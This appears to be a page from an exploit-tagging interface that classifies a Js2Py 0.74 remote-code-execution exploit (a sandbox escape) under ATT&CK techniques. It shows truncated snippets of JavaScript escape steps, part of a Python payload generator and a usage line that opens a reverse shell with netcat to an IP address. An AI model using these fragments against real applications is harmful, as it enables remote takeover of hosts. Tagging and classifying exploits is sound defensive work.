[webapps] Js2Py 0.74 - RCE
ATT&CK techniques detected
T1059.006Python
61%
"/ / 1. obtain a pyobjectwrapper via object. getownpropertynames ( { } ) / / on python 3, this returns a wrapped dict _ keys object, exposing python internals. var leaked _ wrapper = object. getownpropertynames ( { } ) ; / / 2. access the python ' object ' class via _ _ class _ _.…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.007JavaScript
50%
"[ webapps ] js2py 0. 74 - rce js2py 0. 74 - rce exploit title : js2py 0. 74 - rce date : 2026 - 02 - 03 exploit author : ali sunbul ( xeloxa ) < alisunbul @ proton. me > author page : https : / / github. com / xeloxa vendor homepage : https : / / github. com / piotrdabkowski / js…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.006Python
42%
"during exploit execution : " + e ; } output " " " return payload. replace ( " command _ placeholder ", safe _ command ) def main ( ) - > none : parser = argparse. argumentparser ( description = " payload generator for cve - 2024 - 28397 ( js2py sandbox escape ) ", formatter _ cla…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.007JavaScript
37%
"execute arbitrary commands on the host. this script acts as a payload generator. you must inject the generated output into the vulnerable input field of the target application. usage : python3 exploit. py - c " id " > payload. js python3 exploit. py - c " nc - e / bin / bash 10. …"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Js2Py 0.74 - RCE